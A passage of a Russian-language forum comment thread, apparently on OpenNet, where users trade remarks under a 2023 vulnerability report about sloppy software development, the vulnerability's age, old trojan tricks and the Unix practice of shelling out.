    > Врачи пишут планировщики задач, студни и всякие бoмжы пишут свои утилитки "лишь бы работало", потом приходят другие и лепят на основе этих поделок что-то свое, потом это слепливают в большой дурнопахнущий ком и выкладывают в прод.

    Святая наивность, ты никогда не видел коммерческой разработки изнутри.

     
  • 2.98, Аноним (96), 12:01, 22/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    https://xkcd.com/2347/
     

  • 1.88, Alex (??), 06:13, 22/01/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    Странно, что не написали сколько лет этой уязвимости....
     
     
  • 2.89, Аноним (-), 08:11, 22/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Или им было стыдно это писать,
    или все кто знал уже ущли на пенсию.
     
  • 2.104, Аноним (1), 00:15, 23/01/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    замена системных экзешников на троянов? Да постарше тебя уж.
     

  • 1.120, Аноним (119), 05:12, 25/01/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Угар, конечно, как в тут
    папуасы ругают классику программирования под юникс — т.н. shell out. А ведь это неотъемлемая часть «юникс-философии», за которую в комментариях порой убить готовы. Как же так выходит, половина комментаторов TAOUP не читала? Грешновато.
     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2024 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру